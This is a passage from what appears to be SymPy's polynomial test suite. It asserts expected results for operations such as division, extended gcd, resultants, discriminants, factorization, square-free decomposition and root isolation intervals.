assert quo(f, g, domain=ZZ) == qz
assert quo(f, g, domain=QQ) == qq
assert quo(f, g, domain=ZZ, auto=True) == qq
assert quo(f, g, domain=ZZ, auto=False) == qz
assert quo(f, g, domain=QQ, auto=True) == qq
assert quo(f, g, domain=QQ, auto=False) == qq
f, g, q = x**2, 2*x, x/2
assert exquo(f, g) == q
assert exquo(f, g, auto=True) == q
raises(ExactQuotientFailed, lambda: exquo(f, g, auto=False))
raises(ExactQuotientFailed, lambda: exquo(f, g, domain=ZZ))
assert exquo(f, g, domain=QQ) == q
assert exquo(f, g, domain=ZZ, auto=True) == q
raises(ExactQuotientFailed, lambda: exquo(f, g, domain=ZZ, auto=False))
assert exquo(f, g, domain=QQ, auto=True) == q
assert exquo(f, g, domain=QQ, auto=False) == q
f, g = Poly(x**2), Poly(x)
q, r = f.div(g)
assert q.get_domain().is_ZZ and r.get_domain().is_ZZ
r = f.rem(g)
assert r.get_domain().is_ZZ
q = f.quo(g)
assert q.get_domain().is_ZZ
q = f.exquo(g)
assert q.get_domain().is_ZZ
def test_gcdex():
f, g = 2*x, x**2 - 16
s, t, h = x/32, -Rational(1, 16), 1
F, G, S, T, H = [ Poly(u, x, domain='QQ') for u in (f, g, s, t, h) ]
assert F.half_gcdex(G) == (S, H)
assert F.gcdex(G) == (S, T, H)
assert F.invert(G) == S
assert half_gcdex(f, g) == (s, h)
assert gcdex(f, g) == (s, t, h)
assert invert(f, g) == s
assert half_gcdex(f, g, x) == (s, h)
assert gcdex(f, g, x) == (s, t, h)
assert invert(f, g, x) == s
assert half_gcdex(f, g, (x,)) == (s, h)
assert gcdex(f, g, (x,)) == (s, t, h)
assert invert(f, g, (x,)) == s
assert half_gcdex(F, G) == (S, H)
assert gcdex(F, G) == (S, T, H)
assert invert(F, G) == S
assert half_gcdex(f, g, polys=True) == (S, H)
assert gcdex(f, g, polys=True) == (S, T, H)
assert invert(f, g, polys=True) == S
assert half_gcdex(F, G, polys=False) == (s, h)
assert gcdex(F, G, polys=False) == (s, t, h)
assert invert(F, G, polys=False) == s
assert half_gcdex(100, 2004) == (-20, 4)
assert gcdex(100, 2004) == (-20, 1, 4)
assert invert(3, 7) == 5
raises(DomainError, lambda: half_gcdex(x + 1, 2*x + 1, auto=False))
raises(DomainError, lambda: gcdex(x + 1, 2*x + 1, auto=False))
raises(DomainError, lambda: invert(x + 1, 2*x + 1, auto=False))
def test_revert():
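    # f is the degree-6 Taylor truncation of cos(x); revert(8) computes its series
    # inverse modulo x**8, i.e. the corresponding truncation of sec(x).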
f = Poly(1 - x**2/2 + x**4/24 - x**6/720)
g = Poly(61*x**6/720 + 5*x**4/24 + x**2/2 + 1)
assert f.revert(8) == g
def test_subresultants():
f, g, h = x**2 - 2*x + 1, x**2 - 1, 2*x - 2
F, G, H = Poly(f), Poly(g), Poly(h)
assert F.subresultants(G) == [F, G, H]
assert subresultants(f, g) == [f, g, h]
assert subresultants(f, g, x) == [f, g, h]
assert subresultants(f, g, (x,)) == [f, g, h]
assert subresultants(F, G) == [F, G, H]
assert subresultants(f, g, polys=True) == [F, G, H]
assert subresultants(F, G, polys=False) == [f, g, h]
raises(ComputationFailed, lambda: subresultants(4, 2))
def test_resultant():
f, g, h = x**2 - 2*x + 1, x**2 - 1, 0
F, G = Poly(f), Poly(g)
assert F.resultant(G) == h
assert resultant(f, g) == h
assert resultant(f, g, x) == h
assert resultant(f, g, (x,)) == h
assert resultant(F, G) == h
assert resultant(f, g, polys=True) == h
assert resultant(F, G, polys=False) == h
assert resultant(f, g, includePRS=True) == (h, [f, g, 2*x - 2])
f, g, h = x - a, x - b, a - b
F, G, H = Poly(f), Poly(g), Poly(h)
assert F.resultant(G) == H
assert resultant(f, g) == h
assert resultant(f, g, x) == h
assert resultant(f, g, (x,)) == h
assert resultant(F, G) == H
assert resultant(f, g, polys=True) == H
assert resultant(F, G, polys=False) == h
raises(ComputationFailed, lambda: resultant(4, 2))
def test_discriminant():
f, g = x**3 + 3*x**2 + 9*x - 13, -11664
F = Poly(f)
assert F.discriminant() == g
assert discriminant(f) == g
assert discriminant(f, x) == g
assert discriminant(f, (x,)) == g
assert discriminant(F) == g
assert discriminant(f, polys=True) == g
assert discriminant(F, polys=False) == g
f, g = a*x**2 + b*x + c, b**2 - 4*a*c
F, G = Poly(f), Poly(g)
assert F.discriminant() == G
assert discriminant(f) == g
assert discriminant(f, x, a, b, c) == g
assert discriminant(f, (x, a, b, c)) == g
assert discriminant(F) == G
assert discriminant(f, polys=True) == G
assert discriminant(F, polys=False) == g
raises(ComputationFailed, lambda: discriminant(4))
def test_dispersion():
# We test only the API here. For more mathematical
# tests see the dedicated test file.
fp = poly((x + 1)*(x + 2), x)
assert sorted(fp.dispersionset()) == [0, 1]
assert fp.dispersion() == 1
fp = poly(x**4 - 3*x**2 + 1, x)
gp = fp.shift(-3)
assert sorted(fp.dispersionset(gp)) == [2, 3, 4]
assert fp.dispersion(gp) == 4
def test_gcd_list():
F = [x**3 - 1, x**2 - 1, x**2 - 3*x + 2]
assert gcd_list(F) == x - 1
assert gcd_list(F, polys=True) == Poly(x - 1)
assert gcd_list([]) == 0
assert gcd_list([1, 2]) == 1
assert gcd_list([4, 6, 8]) == 2
assert gcd_list([x*(y + 42) - x*y - x*42]) == 0
gcd = gcd_list([], x)
assert gcd.is_Number and gcd is S.Zero
gcd = gcd_list([], x, polys=True)
assert gcd.is_Poly and gcd.is_zero
raises(ComputationFailed, lambda: gcd_list([], polys=True))
def test_lcm_list():
F = [x**3 - 1, x**2 - 1, x**2 - 3*x + 2]
assert lcm_list(F) == x**5 - x**4 - 2*x**3 - x**2 + x + 2
assert lcm_list(F, polys=True) == Poly(x**5 - x**4 - 2*x**3 - x**2 + x + 2)
assert lcm_list([]) == 1
assert lcm_list([1, 2]) == 2
assert lcm_list([4, 6, 8]) == 24
assert lcm_list([x*(y + 42) - x*y - x*42]) == 0
lcm = lcm_list([], x)
assert lcm.is_Number and lcm is S.One
lcm = lcm_list([], x, polys=True)
assert lcm.is_Poly and lcm.is_one
raises(ComputationFailed, lambda: lcm_list([], polys=True))
def test_gcd():
f, g = x**3 - 1, x**2 - 1
s, t = x**2 + x + 1, x + 1
h, r = x - 1, x**4 + x**3 - x - 1
F, G, S, T, H, R = [ Poly(u) for u in (f, g, s, t, h, r) ]
assert F.cofactors(G) == (H, S, T)
assert F.gcd(G) == H
assert F.lcm(G) == R
assert cofactors(f, g) == (h, s, t)
assert gcd(f, g) == h
assert lcm(f, g) == r
assert cofactors(f, g, x) == (h, s, t)
assert gcd(f, g, x) == h
assert lcm(f, g, x) == r
assert cofactors(f, g, (x,)) == (h, s, t)
assert gcd(f, g, (x,)) == h
assert lcm(f, g, (x,)) == r
assert cofactors(F, G) == (H, S, T)
assert gcd(F, G) == H
assert lcm(F, G) == R
assert cofactors(f, g, polys=True) == (H, S, T)
assert gcd(f, g, polys=True) == H
assert lcm(f, g, polys=True) == R
assert cofactors(F, G, polys=False) == (h, s, t)
assert gcd(F, G, polys=False) == h
assert lcm(F, G, polys=False) == r
f, g = 1.0*x**2 - 1.0, 1.0*x - 1.0
h, s, t = g, 1.0*x + 1.0, 1.0
assert cofactors(f, g) == (h, s, t)
assert gcd(f, g) == h
assert lcm(f, g) == f
f, g = 1.0*x**2 - 1.0, 1.0*x - 1.0
h, s, t = g, 1.0*x + 1.0, 1.0
assert cofactors(f, g) == (h, s, t)
assert gcd(f, g) == h
assert lcm(f, g) == f
assert cofactors(8, 6) == (2, 4, 3)
assert gcd(8, 6) == 2
assert lcm(8, 6) == 24
f, g = x**2 - 3*x - 4, x**3 - 4*x**2 + x - 4
l = x**4 - 3*x**3 - 3*x**2 - 3*x - 4
h, s, t = x - 4, x + 1, x**2 + 1
assert cofactors(f, g, modulus=11) == (h, s, t)
assert gcd(f, g, modulus=11) == h
assert lcm(f, g, modulus=11) == l
f, g = x**2 + 8*x + 7, x**3 + 7*x**2 + x + 7
l = x**4 + 8*x**3 + 8*x**2 + 8*x + 7
h, s, t = x + 7, x + 1, x**2 + 1
assert cofactors(f, g, modulus=11, symmetric=False) == (h, s, t)
assert gcd(f, g, modulus=11, symmetric=False) == h
assert lcm(f, g, modulus=11, symmetric=False) == l
raises(TypeError, lambda: gcd(x))
raises(TypeError, lambda: lcm(x))
def test_gcd_numbers_vs_polys():
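    # For plain numbers the result stays in the number domain: Integer and Rational
    # inputs give exact gcds, while floats collapse to 1.0.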
assert isinstance(gcd(3, 9), Integer)
assert isinstance(gcd(3*x, 9), Integer)
assert gcd(3, 9) == 3
assert gcd(3*x, 9) == 3
assert isinstance(gcd(S(3)/2, S(9)/4), Rational)
assert isinstance(gcd(S(3)/2*x, S(9)/4), Rational)
assert gcd(S(3)/2, S(9)/4) == S(3)/4
assert gcd(S(3)/2*x, S(9)/4) == 1
assert isinstance(gcd(3.0, 9.0), Float)
assert isinstance(gcd(3.0*x, 9.0), Float)
assert gcd(3.0, 9.0) == 1.0
assert gcd(3.0*x, 9.0) == 1.0
def test_terms_gcd():
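    # terms_gcd pulls the common content and monomial out of every term;
    # deep=True also descends into function arguments such as sin(...).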
assert terms_gcd(1) == 1
assert terms_gcd(1, x) == 1
assert terms_gcd(x - 1) == x - 1
assert terms_gcd(-x - 1) == -x - 1
assert terms_gcd(2*x + 3) == 2*x + 3
assert terms_gcd(6*x + 4) == Mul(2, 3*x + 2, evaluate=False)
assert terms_gcd(x**3*y + x*y**3) == x*y*(x**2 + y**2)
assert terms_gcd(2*x**3*y + 2*x*y**3) == 2*x*y*(x**2 + y**2)
assert terms_gcd(x**3*y/2 + x*y**3/2) == x*y/2*(x**2 + y**2)
assert terms_gcd(x**3*y + 2*x*y**3) == x*y*(x**2 + 2*y**2)
assert terms_gcd(2*x**3*y + 4*x*y**3) == 2*x*y*(x**2 + 2*y**2)
assert terms_gcd(2*x**3*y/3 + 4*x*y**3/5) == 2*x*y/15*(5*x**2 + 6*y**2)
assert terms_gcd(2.0*x**3*y + 4.1*x*y**3) == x*y*(2.0*x**2 + 4.1*y**2)
assert _aresame(terms_gcd(2.0*x + 3), 2.0*x + 3)
assert terms_gcd((3 + 3*x)*(x + x*y), expand=False) == \
(3*x + 3)*(x*y + x)
assert terms_gcd((3 + 3*x)*(x + x*sin(3 + 3*y)), expand=False, deep=True) == \
3*x*(x + 1)*(sin(Mul(3, y + 1, evaluate=False)) + 1)
assert terms_gcd(sin(x + x*y), deep=True) == \
sin(x*(y + 1))
eq = Eq(2*x, 2*y + 2*z*y)
assert terms_gcd(eq) == eq
assert terms_gcd(eq, deep=True) == Eq(2*x, 2*y*(z + 1))
def test_trunc():
f, g = x**5 + 2*x**4 + 3*x**3 + 4*x**2 + 5*x + 6, x**5 - x**4 + x**2 - x
F, G = Poly(f), Poly(g)
assert F.trunc(3) == G
assert trunc(f, 3) == g
assert trunc(f, 3, x) == g
assert trunc(f, 3, (x,)) == g
assert trunc(F, 3) == G
assert trunc(f, 3, polys=True) == G
assert trunc(F, 3, polys=False) == g
f, g = 6*x**5 + 5*x**4 + 4*x**3 + 3*x**2 + 2*x + 1, -x**4 + x**3 - x + 1
F, G = Poly(f), Poly(g)
assert F.trunc(3) == G
assert trunc(f, 3) == g
assert trunc(f, 3, x) == g
assert trunc(f, 3, (x,)) == g
assert trunc(F, 3) == G
assert trunc(f, 3, polys=True) == G
assert trunc(F, 3, polys=False) == g
f = Poly(x**2 + 2*x + 3, modulus=5)
assert f.trunc(2) == Poly(x**2 + 1, modulus=5)
def test_monic():
f, g = 2*x - 1, x - S(1)/2
F, G = Poly(f, domain='QQ'), Poly(g)
assert F.monic() == G
assert monic(f) == g
assert monic(f, x) == g
assert monic(f, (x,)) == g
assert monic(F) == G
assert monic(f, polys=True) == G
assert monic(F, polys=False) == g
raises(ComputationFailed, lambda: monic(4))
assert monic(2*x**2 + 6*x + 4, auto=False) == x**2 + 3*x + 2
raises(ExactQuotientFailed, lambda: monic(2*x + 6*x + 1, auto=False))
assert monic(2.0*x**2 + 6.0*x + 4.0) == 1.0*x**2 + 3.0*x + 2.0
assert monic(2*x**2 + 3*x + 4, modulus=5) == x**2 - x + 2
def test_content():
f, F = 4*x + 2, Poly(4*x + 2)
assert F.content() == 2
assert content(f) == 2
raises(ComputationFailed, lambda: content(4))
f = Poly(2*x, modulus=3)
assert f.content() == 1
def test_primitive():
f, g = 4*x + 2, 2*x + 1
F, G = Poly(f), Poly(g)
assert F.primitive() == (2, G)
assert primitive(f) == (2, g)
assert primitive(f, x) == (2, g)
assert primitive(f, (x,)) == (2, g)
assert primitive(F) == (2, G)
assert primitive(f, polys=True) == (2, G)
assert primitive(F, polys=False) == (2, g)
raises(ComputationFailed, lambda: primitive(4))
f = Poly(2*x, modulus=3)
g = Poly(2.0*x, domain=RR)
assert f.primitive() == (1, f)
assert g.primitive() == (1.0, g)
assert primitive(S('-3*x/4 + y + 11/8')) == \
S('(1/8, -6*x + 8*y + 11)')
def test_compose():
f = x**12 + 20*x**10 + 150*x**8 + 500*x**6 + 625*x**4 - 2*x**3 - 10*x + 9
g = x**4 - 2*x + 9
h = x**3 + 5*x
F, G, H = map(Poly, (f, g, h))
assert G.compose(H) == F
assert compose(g, h) == f
assert compose(g, h, x) == f
assert compose(g, h, (x,)) == f
assert compose(G, H) == F
assert compose(g, h, polys=True) == F
assert compose(G, H, polys=False) == f
assert F.decompose() == [G, H]
assert decompose(f) == [g, h]
assert decompose(f, x) == [g, h]
assert decompose(f, (x,)) == [g, h]
assert decompose(F) == [G, H]
assert decompose(f, polys=True) == [G, H]
assert decompose(F, polys=False) == [g, h]
raises(ComputationFailed, lambda: compose(4, 2))
raises(ComputationFailed, lambda: decompose(4))
assert compose(x**2 - y**2, x - y, x, y) == x**2 - 2*x*y
assert compose(x**2 - y**2, x - y, y, x) == -y**2 + 2*x*y
def test_shift():
assert Poly(x**2 - 2*x + 1, x).shift(2) == Poly(x**2 + 2*x + 1, x)
def test_sturm():
f, F = x, Poly(x, domain='QQ')
g, G = 1, Poly(1, x, domain='QQ')
assert F.sturm() == [F, G]
assert sturm(f) == [f, g]
assert sturm(f, x) == [f, g]
assert sturm(f, (x,)) == [f, g]
assert sturm(F) == [F, G]
assert sturm(f, polys=True) == [F, G]
assert sturm(F, polys=False) == [f, g]
raises(ComputationFailed, lambda: sturm(4))
raises(DomainError, lambda: sturm(f, auto=False))
f = Poly(S(1024)/(15625*pi**8)*x**5
- S(4096)/(625*pi**8)*x**4
+ S(32)/(15625*pi**4)*x**3
- S(128)/(625*pi**4)*x**2
+ S(1)/62500*x
- S(1)/625, x, domain='ZZ(pi)')
assert sturm(f) == \
[Poly(x**3 - 100*x**2 + pi**4/64*x - 25*pi**4/16, x, domain='ZZ(pi)'),
Poly(3*x**2 - 200*x + pi**4/64, x, domain='ZZ(pi)'),
Poly((S(20000)/9 - pi**4/96)*x + 25*pi**4/18, x, domain='ZZ(pi)'),
Poly((-3686400000000*pi**4 - 11520000*pi**8 - 9*pi**12)/(26214400000000 - 245760000*pi**4 + 576*pi**8), x, domain='ZZ(pi)')]
def test_gff():
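    # gff_list computes the greatest factorial factorization; the expression-level
    # gff() itself is not implemented, hence the NotImplementedError checks.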
f = x**5 + 2*x**4 - x**3 - 2*x**2
assert Poly(f).gff_list() == [(Poly(x), 1), (Poly(x + 2), 4)]
assert gff_list(f) == [(x, 1), (x + 2, 4)]
raises(NotImplementedError, lambda: gff(f))
f = x*(x - 1)**3*(x - 2)**2*(x - 4)**2*(x - 5)
assert Poly(f).gff_list() == [(
Poly(x**2 - 5*x + 4), 1), (Poly(x**2 - 5*x + 4), 2), (Poly(x), 3)]
assert gff_list(f) == [(x**2 - 5*x + 4, 1), (x**2 - 5*x + 4, 2), (x, 3)]
raises(NotImplementedError, lambda: gff(f))
def test_sqf_norm():
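    # sqf_norm(f, extension=a) returns (s, g, r) with g = f(x - s*a) and
    # r = Norm(g) square-free over the base field.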
assert sqf_norm(x**2 - 2, extension=sqrt(3)) == \
(1, x**2 - 2*sqrt(3)*x + 1, x**4 - 10*x**2 + 1)
assert sqf_norm(x**2 - 3, extension=sqrt(2)) == \
(1, x**2 - 2*sqrt(2)*x - 1, x**4 - 10*x**2 + 1)
assert Poly(x**2 - 2, extension=sqrt(3)).sqf_norm() == \
(1, Poly(x**2 - 2*sqrt(3)*x + 1, x, extension=sqrt(3)),
Poly(x**4 - 10*x**2 + 1, x, domain='QQ'))
assert Poly(x**2 - 3, extension=sqrt(2)).sqf_norm() == \
(1, Poly(x**2 - 2*sqrt(2)*x - 1, x, extension=sqrt(2)),
Poly(x**4 - 10*x**2 + 1, x, domain='QQ'))
def test_sqf():
f = x**5 - x**3 - x**2 + 1
g = x**3 + 2*x**2 + 2*x + 1
h = x - 1
p = x**4 + x**3 - x - 1
F, G, H, P = map(Poly, (f, g, h, p))
assert F.sqf_part() == P
assert sqf_part(f) == p
assert sqf_part(f, x) == p
assert sqf_part(f, (x,)) == p
assert sqf_part(F) == P
assert sqf_part(f, polys=True) == P
assert sqf_part(F, polys=False) == p
assert F.sqf_list() == (1, [(G, 1), (H, 2)])
assert sqf_list(f) == (1, [(g, 1), (h, 2)])
assert sqf_list(f, x) == (1, [(g, 1), (h, 2)])
assert sqf_list(f, (x,)) == (1, [(g, 1), (h, 2)])
assert sqf_list(F) == (1, [(G, 1), (H, 2)])
assert sqf_list(f, polys=True) == (1, [(G, 1), (H, 2)])
assert sqf_list(F, polys=False) == (1, [(g, 1), (h, 2)])
assert F.sqf_list_include() == [(G, 1), (H, 2)]
raises(ComputationFailed, lambda: sqf_part(4))
assert sqf(1) == 1
assert sqf_list(1) == (1, [])
assert sqf((2*x**2 + 2)**7) == 128*(x**2 + 1)**7
assert sqf(f) == g*h**2
assert sqf(f, x) == g*h**2
assert sqf(f, (x,)) == g*h**2
d = x**2 + y**2
assert sqf(f/d) == (g*h**2)/d
assert sqf(f/d, x) == (g*h**2)/d
assert sqf(f/d, (x,)) == (g*h**2)/d
assert sqf(x - 1) == x - 1
assert sqf(-x - 1) == -x - 1
assert sqf(x - 1) == x - 1
assert sqf(6*x - 10) == Mul(2, 3*x - 5, evaluate=False)
assert sqf((6*x - 10)/(3*x - 6)) == S(2)/3*((3*x - 5)/(x - 2))
assert sqf(Poly(x**2 - 2*x + 1)) == (x - 1)**2
f = 3 + x - x*(1 + x) + x**2
assert sqf(f) == 3
f = (x**2 + 2*x + 1)**20000000000
assert sqf(f) == (x + 1)**40000000000
assert sqf_list(f) == (1, [(x + 1, 40000000000)])
def test_factor():
f = x**5 - x**3 - x**2 + 1
u = x + 1
v = x - 1
w = x**2 + x + 1
F, U, V, W = map(Poly, (f, u, v, w))
assert F.factor_list() == (1, [(U, 1), (V, 2), (W, 1)])
assert factor_list(f) == (1, [(u, 1), (v, 2), (w, 1)])
assert factor_list(f, x) == (1, [(u, 1), (v, 2), (w, 1)])
assert factor_list(f, (x,)) == (1, [(u, 1), (v, 2), (w, 1)])
assert factor_list(F) == (1, [(U, 1), (V, 2), (W, 1)])
assert factor_list(f, polys=True) == (1, [(U, 1), (V, 2), (W, 1)])
assert factor_list(F, polys=False) == (1, [(u, 1), (v, 2), (w, 1)])
assert F.factor_list_include() == [(U, 1), (V, 2), (W, 1)]
assert factor_list(1) == (1, [])
assert factor_list(6) == (6, [])
assert factor_list(sqrt(3), x) == (1, [(3, S.Half)])
assert factor_list((-1)**x, x) == (1, [(-1, x)])
assert factor_list((2*x)**y, x) == (1, [(2, y), (x, y)])
assert factor_list(sqrt(x*y), x) == (1, [(x*y, S.Half)])
assert factor(6) == 6 and factor(6).is_Integer
assert factor_list(3*x) == (3, [(x, 1)])
assert factor_list(3*x**2) == (3, [(x, 2)])
assert factor(3*x) == 3*x
assert factor(3*x**2) == 3*x**2
assert factor((2*x**2 + 2)**7) == 128*(x**2 + 1)**7
assert factor(f) == u*v**2*w
assert factor(f, x) == u*v**2*w
assert factor(f, (x,)) == u*v**2*w
g, p, q, r = x**2 - y**2, x - y, x + y, x**2 + 1
assert factor(f/g) == (u*v**2*w)/(p*q)
assert factor(f/g, x) == (u*v**2*w)/(p*q)
assert factor(f/g, (x,)) == (u*v**2*w)/(p*q)
p = Symbol('p', positive=True)
i = Symbol('i', integer=True)
r = Symbol('r', real=True)
assert factor(sqrt(x*y)).is_Pow is True
assert factor(sqrt(3*x**2 - 3)) == sqrt(3)*sqrt((x - 1)*(x + 1))
assert factor(sqrt(3*x**2 + 3)) == sqrt(3)*sqrt(x**2 + 1)
assert factor((y*x**2 - y)**i) == y**i*(x - 1)**i*(x + 1)**i
assert factor((y*x**2 + y)**i) == y**i*(x**2 + 1)**i
assert factor((y*x**2 - y)**t) == (y*(x - 1)*(x + 1))**t
assert factor((y*x**2 + y)**t) == (y*(x**2 + 1))**t
f = sqrt(expand((r**2 + 1)*(p + 1)*(p - 1)*(p - 2)**3))
g = sqrt((p - 2)**3*(p - 1))*sqrt(p + 1)*sqrt(r**2 + 1)
assert factor(f) == g
assert factor(g) == g
g = (x - 1)**5*(r**2 + 1)
f = sqrt(expand(g))
assert factor(f) == sqrt(g)
f = Poly(sin(1)*x + 1, x, domain=EX)
assert f.factor_list() == (1, [(f, 1)])
f = x**4 + 1
assert factor(f) == f
assert factor(f, extension=I) == (x**2 - I)*(x**2 + I)
assert factor(f, gaussian=True) == (x**2 - I)*(x**2 + I)
assert factor(
f, extension=sqrt(2)) == (x**2 + sqrt(2)*x + 1)*(x**2 - sqrt(2)*x + 1)
f = x**2 + 2*sqrt(2)*x + 2
assert factor(f, extension=sqrt(2)) == (x + sqrt(2))**2
assert factor(f**3, extension=sqrt(2)) == (x + sqrt(2))**6
assert factor(x**2 - 2*y**2, extension=sqrt(2)) == \
(x + sqrt(2)*y)*(x - sqrt(2)*y)
assert factor(2*x**2 - 4*y**2, extension=sqrt(2)) == \
2*((x + sqrt(2)*y)*(x - sqrt(2)*y))
assert factor(x - 1) == x - 1
assert factor(-x - 1) == -x - 1
assert factor(x - 1) == x - 1
assert factor(6*x - 10) == Mul(2, 3*x - 5, evaluate=False)
assert factor(x**11 + x + 1, modulus=65537, symmetric=True) == \
(x**2 + x + 1)*(x**9 - x**8 + x**6 - x**5 + x**3 - x** 2 + 1)
assert factor(x**11 + x + 1, modulus=65537, symmetric=False) == \
(x**2 + x + 1)*(x**9 + 65536*x**8 + x**6 + 65536*x**5 +
x**3 + 65536*x** 2 + 1)
f = x/pi + x*sin(x)/pi
g = y/(pi**2 + 2*pi + 1) + y*sin(x)/(pi**2 + 2*pi + 1)
assert factor(f) == x*(sin(x) + 1)/pi
assert factor(g) == y*(sin(x) + 1)/(pi + 1)**2
assert factor(Eq(
x**2 + 2*x + 1, x**3 + 1)) == Eq((x + 1)**2, (x + 1)*(x**2 - x + 1))
f = (x**2 - 1)/(x**2 + 4*x + 4)
assert factor(f) == (x + 1)*(x - 1)/(x + 2)**2
assert factor(f, x) == (x + 1)*(x - 1)/(x + 2)**2
f = 3 + x - x*(1 + x) + x**2
assert factor(f) == 3
assert factor(f, x) == 3
assert factor(1/(x**2 + 2*x + 1/x) - 1) == -((1 - x + 2*x**2 +
x**3)/(1 + 2*x**2 + x**3))
assert factor(f, expand=False) == f
raises(PolynomialError, lambda: factor(f, x, expand=False))
raises(FlagError, lambda: factor(x**2 - 1, polys=True))
assert factor([x, Eq(x**2 - y**2, Tuple(x**2 - z**2, 1/x + 1/y))]) == \
[x, Eq((x - y)*(x + y), Tuple((x - z)*(x + z), (x + y)/x/y))]
assert not isinstance(
Poly(x**3 + x + 1).factor_list()[1][0][0], PurePoly) is True
assert isinstance(
PurePoly(x**3 + x + 1).factor_list()[1][0][0], PurePoly) is True
assert factor(sqrt(-x)) == sqrt(-x)
# issue 5917
e = (-2*x*(-x + 1)*(x - 1)*(-x*(-x + 1)*(x - 1) - x*(x - 1)**2)*(x**2*(x -
1) - x*(x - 1) - x) - (-2*x**2*(x - 1)**2 - x*(-x + 1)*(-x*(-x + 1) +
x*(x - 1)))*(x**2*(x - 1)**4 - x*(-x*(-x + 1)*(x - 1) - x*(x - 1)**2)))
assert factor(e) == 0
# deep option
assert factor(sin(x**2 + x) + x, deep=True) == sin(x*(x + 1)) + x
assert factor(sqrt(x**2)) == sqrt(x**2)
def test_factor_large():
f = (x**2 + 4*x + 4)**10000000*(x**2 + 1)*(x**2 + 2*x + 1)**1234567
g = ((x**2 + 2*x + 1)**3000*y**2 + (x**2 + 2*x + 1)**3000*2*y + (
x**2 + 2*x + 1)**3000)
assert factor(f) == (x + 2)**20000000*(x**2 + 1)*(x + 1)**2469134
assert factor(g) == (x + 1)**6000*(y + 1)**2
assert factor_list(
f) == (1, [(x + 1, 2469134), (x + 2, 20000000), (x**2 + 1, 1)])
assert factor_list(g) == (1, [(y + 1, 2), (x + 1, 6000)])
f = (x**2 - y**2)**200000*(x**7 + 1)
g = (x**2 + y**2)**200000*(x**7 + 1)
assert factor(f) == \
(x + 1)*(x - y)**200000*(x + y)**200000*(x**6 - x**5 +
x**4 - x**3 + x**2 - x + 1)
assert factor(g, gaussian=True) == \
(x + 1)*(x - I*y)**200000*(x + I*y)**200000*(x**6 - x**5 +
x**4 - x**3 + x**2 - x + 1)
assert factor_list(f) == \
(1, [(x + 1, 1), (x - y, 200000), (x + y, 200000), (x**6 -
x**5 + x**4 - x**3 + x**2 - x + 1, 1)])
assert factor_list(g, gaussian=True) == \
(1, [(x + 1, 1), (x - I*y, 200000), (x + I*y, 200000), (
x**6 - x**5 + x**4 - x**3 + x**2 - x + 1, 1)])
@XFAIL
def test_factor_noeval():
assert factor(6*x - 10) == 2*(3*x - 5)
assert factor((6*x - 10)/(3*x - 6)) == S(2)/3*((3*x - 5)/(x - 2))
def test_intervals():
assert intervals(0) == []
assert intervals(1) == []
assert intervals(x, sqf=True) == [(0, 0)]
assert intervals(x) == [((0, 0), 1)]
assert intervals(x**128) == [((0, 0), 128)]
assert intervals([x**2, x**4]) == [((0, 0), {0: 2, 1: 4})]
f = Poly((2*x/5 - S(17)/3)*(4*x + S(1)/257))
assert f.intervals(sqf=True) == [(-1, 0), (14, 15)]
assert f.intervals() == [((-1, 0), 1), ((14, 15), 1)]
assert f.intervals(fast=True, sqf=True) == [(-1, 0), (14, 15)]
assert f.intervals(fast=True) == [((-1, 0), 1), ((14, 15), 1)]
assert f.intervals(eps=S(1)/10) == f.intervals(eps=0.1) == \
[((-S(1)/258, 0), 1), ((S(85)/6, S(85)/6), 1)]
assert f.intervals(eps=S(1)/100) == f.intervals(eps=0.01) == \
[((-S(1)/258, 0), 1), ((S(85)/6, S(85)/6), 1)]
assert f.intervals(eps=S(1)/1000) == f.intervals(eps=0.001) == \
[((-S(1)/1002, 0), 1), ((S(85)/6, S(85)/6), 1)]
assert f.intervals(eps=S(1)/10000) == f.intervals(eps=0.0001) == \
[((-S(1)/1028, -S(1)/1028), 1), ((S(85)/6, S(85)/6), 1)]
f = (2*x/5 - S(17)/3)*(4*x + S(1)/257)
assert intervals(f, sqf=True) == [(-1, 0), (14, 15)]
assert intervals(f) == [((-1, 0), 1), ((14, 15), 1)]
assert intervals(f, eps=S(1)/10) == intervals(f, eps=0.1) == \
[((-S(1)/258, 0), 1), ((S(85)/6, S(85)/6), 1)]
assert intervals(f, eps=S(1)/100) == intervals(f, eps=0.01) == \
[((-S(1)/258, 0), 1), ((S(85)/6, S(85)/6), 1)]
assert intervals(f, eps=S(1)/1000) == intervals(f, eps=0.001) == \
[((-S(1)/1002, 0), 1), ((S(85)/6, S(85)/6), 1)]
assert intervals(f, eps=S(1)/10000) == intervals(f, eps=0.0001) == \
[((-S(1)/1028, -S(1)/1028), 1), ((S(85)/6, S(85)/6), 1)]
f = Poly((x**2 - 2)*(x**2 - 3)**7*(x + 1)*(7*x + 3)**3)
assert f.intervals() == \
[((-2, -S(3)/2), 7), ((-S(3)/2, -1), 1),
((-1, -1), 1), ((-1, 0), 3),
((1, S(3)/2), 1), ((S(3)/2, 2), 7)]
assert intervals([x**5 - 200, x**5 - 201]) == \
[((S(75)/26, S(101)/35), {0: 1}), ((S(309)/107, S(26)/9), {1: 1})]
assert intervals([x**5 - 200, x**5 - 201], fast=True) == \
[((S(75)/26, S(101)/35), {0: 1}), ((S(309)/107, S(26)/9), {1: 1})]
assert intervals([x**2 - 200, x**2 - 201]) == \
[((-S(71)/5, -S(85)/6), {1: 1}), ((-S(85)/6, -14), {0: 1}),
((14, S(85)/6), {0: 1}), ((S(85)/6, S(71)/5), {1: 1})]
assert intervals([x + 1, x + 2, x - 1, x + 1, 1, x - 1, x - 1, (x - 2)**2]) == \
[((-2, -2), {1: 1}), ((-1, -1), {0: 1, 3: 1}), ((1, 1), {2:
1, 5: 1, 6: 1}), ((2, 2), {7: 2})]
f, g, h = x**2 - 2, x**4 - 4*x**2 + 4, x - 1
assert intervals(f, inf=S(7)/4, sqf=True) == []
assert intervals(f, inf=S(7)/5, sqf=True) == [(S(7)/5, S(3)/2)]
assert intervals(f, sup=S(7)/4, sqf=True) == [(-2, -1), (1, S(3)/2)]
assert intervals(f, sup=S(7)/5, sqf=True) == [(-2, -1)]
assert intervals(g, inf=S(7)/4) == []
assert intervals(g, inf=S(7)/5) == [((S(7)/5, S(3)/2), 2)]
assert intervals(g, sup=S(7)/4) == [((-2, -1), 2), ((1, S(3)/2), 2)]
assert intervals(g, sup=S(7)/5) == [((-2, -1), 2)]
assert intervals([g, h], inf=S(7)/4) == []
assert intervals([g, h], inf=S(7)/5) == [((S(7)/5, S(3)/2), {0: 2})]
assert intervals([g, h], sup=S(
7)/4) == [((-2, -1), {0: 2}), ((1, 1), {1: 1}), ((1, S(3)/2), {0: 2})]
assert intervals(
